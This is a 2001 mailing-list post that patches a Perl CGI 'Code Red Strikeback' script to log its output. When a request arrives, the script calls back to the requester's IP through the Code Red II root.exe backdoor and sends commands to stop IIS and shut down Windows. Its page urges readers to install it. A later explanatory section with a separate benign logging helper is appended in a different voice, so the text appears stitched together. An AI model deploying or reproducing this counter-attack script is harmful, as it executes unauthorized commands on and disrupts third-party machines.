Untested.....

On Tue, 18 Sep 2001 18:01:09 -0400  "Douglas J. Hunley" wrote:
> 
> I need someone to modify the code attached to print to a logfile 
> (/var/log/code_red) a duplicate of everything it currently prints to stdout. 
> Any takers? Thanks!
> -- 
> Douglas J. Hunley ([EMAIL PROTECTED]) - Linux User #174778 
> Admin: http://hunley.homeip.net/      Admin: http://linux.nf/ 
> Brainbench Linux Administration Certified
> 

#!/usr/bin/perl -w

#   default.ida in perl
#   Copyright 2001 Sam Phillips <[EMAIL PROTECTED]>
#       ideas borrowed from Erin Quinlan <[EMAIL PROTECTED]>
#       ideas provided by various Internet folk, and all those darn
#           Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers
#           (http://www.pigdog.org)
#   Text modifications by Andreas Huettel <[EMAIL PROTECTED]>    
#
#   Things that this should do...
#       * Send email to the machine owner
#       * Not act as an attack amplifier - someone could theoretically use this
#         to launch a DOS attack of sorts.
#   
#   This program is free software; you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation; either version 2 of the License, or
#   (at your option) any later version.
#   
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details.
#   
#   You should have received a copy of the GNU General Public License
#   along with this program; if not, write to the Free Software
#   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
#   

use LWP::UserAgent;
use HTTP::Request;
use Carp;   # needed for carp() below

$|++;

open (LOG,">>/var/log/code_red") || carp "Can't open logfile\n";
print "Content-Type: text/html\n\n";
print LOG "Content-Type: text/html\n\n";

if (length ($ENV{QUERY_STRING}) > 0) {
    my $ua = new LWP::UserAgent;
    $ua->agent ("Code Red Strikeback");
    $ua->timeout (20);

    my $iis_stop_req = new HTTP::Request (GET =>
        "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");

    print "probulating... <br>";
    print LOG "probulating... <br>";

    my $resp = $ua->request ($iis_stop_req);

    if ($resp->is_success) {
        print "Appears we have shut down IIS...<br>";
        print LOG "Appears we have shut down IIS...<br>";
        my $server_stop_req = new HTTP::Request (GET =>
            "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
        $resp = $ua->request ($server_stop_req);
        
        if ($resp->is_success) {
           print "Appears that we have also shutdown whatever OS too...<br>";
           print LOG "Appears that we have also shutdown whatever OS too...<br>";
        }

        # ok this will do magic email stuff when I get a chance to write it.


    } else {
        print "<h2>Boy! Are you yankin' my chain?!?</h2>";
        print LOG "<h2>Boy! Are you yankin' my chain?!?</h2>";
    }
    
} 

print <<EOF;
    <p>
        <h1>WELCOME READERS!</h1>
    </p> 
    <p>
        <H2>If you are reading this page, then you are probably curious... </H2>
    </p>
    <p>
        This page is actually a script that will connect to your machine and
        try to shut it down.  Since you are seeing this you probably aren't a
        Code Red infected box.  
    </p>
    <p>
        This will only work if you are infected with the "code red II" worm
        which uses a well-known vulnerability of the Microsoft Internet
        Information Server (IIS) and installs a backdoor on every infected
        computer. For technical information about the Code Red II worm see
        <a href="http://www.incidents.org/react/code_redII.php">http://www.incidents.org/react/code_redII.php</a>.
    </p>
    <p> 
        If you were a Code Red infected IIS then the command just sent to port
        80 was to stop IIS and to reboot your machine. If you aren't infected,
        then you have nothing to worry about; otherwise, you should really use
        a secure <A HREF="http://www.apache.org/">webserver</A>, don't you think?
        (One that doesn't let people in through a gaping back door to do stuff like this...)
    </p>

    <p>
        This is how you can protect yourself and others, if you run perl, and a
        competent web server:
        <ol>
            <li>Download this <a href="default.txt">script</a>.</li>
            <li>Rename it default.ida and place it in the DocumentRoot of your
                server</li>
            <li>Make sure the .ida extension is handled as a perl CGI
                script.</li>
        </ol>
        If you can't figure out any of the above instructions then find someone
        who can.
    </p>

    
EOF
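The patch above answers the request by doubling every print statement. As an added example (not the list author's code, and not part of the script above), here is the same "duplicate stdout to /var/log/code_red" requirement done once through a small tee helper, with two checks a practitioner would want: the script keeps rendering when the logfile cannot be opened, and the untrusted values it records (REMOTE_ADDR, QUERY_STRING) have control characters stripped so one request stays one log line. The `out`, `sanitize` and `CODE_RED_LOG` names are assumptions introduced here; the log path defaults to the one asked for in the thread.

```perl
#!/usr/bin/perl -w
# Added example: tee CGI output to stdout and an append-only logfile.
# Not the list author's script; function names and CODE_RED_LOG are assumed.
use strict;
use POSIX qw(strftime);

# Assumed log path. The web server's user must be able to append to it.
my $LOGFILE = $ENV{CODE_RED_LOG} || '/var/log/code_red';

my $log;
unless (open($log, '>>', $LOGFILE)) {
    # Do not die: the page must still render if logging is unavailable.
    warn "cannot append to $LOGFILE: $!\n";
    undef $log;
}

# REMOTE_ADDR and QUERY_STRING come from the client, so strip CR/LF and
# other control characters before they reach the log.
sub sanitize {
    my ($s) = @_;
    $s = '' unless defined $s;
    $s =~ s/[\x00-\x1f\x7f]/?/g;
    return $s;
}

# Print to stdout and, when the log is open, write the same text there
# prefixed with a UTC timestamp and the client address.
sub out {
    my ($text) = @_;
    print $text;
    return unless $log;
    my $stamp = strftime('%Y-%m-%dT%H:%M:%SZ', gmtime);
    my $peer  = sanitize($ENV{REMOTE_ADDR} || '-');
    (my $line = $text) =~ s/\s+$//;
    print {$log} "$stamp $peer $line\n";
}

$| = 1;
# The HTTP header goes to the browser only; it is not useful in the log.
print "Content-Type: text/html\n\n";

out(sprintf("request from %s: %s<br>\n",
            sanitize($ENV{REMOTE_ADDR} || '-'),
            sanitize($ENV{QUERY_STRING} || '')));
out("<p>Page served.</p>\n");

close $log if $log;
```

Two deployment notes: /var/log is normally not writable by the account a CGI script runs as, so either create the file in advance owned by that account or point CODE_RED_LOG at a directory it can write to; and because every line in this log is attacker-supplied probe data, keep it append-only and treat it as untrusted input when you parse it later.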

_______________________________________________
http://linux.nf -- [EMAIL PROTECTED]
Archives, Subscribe, Unsubscribe, Digest, Etc 
->http://linux.nf/mailman/listinfo/linux-users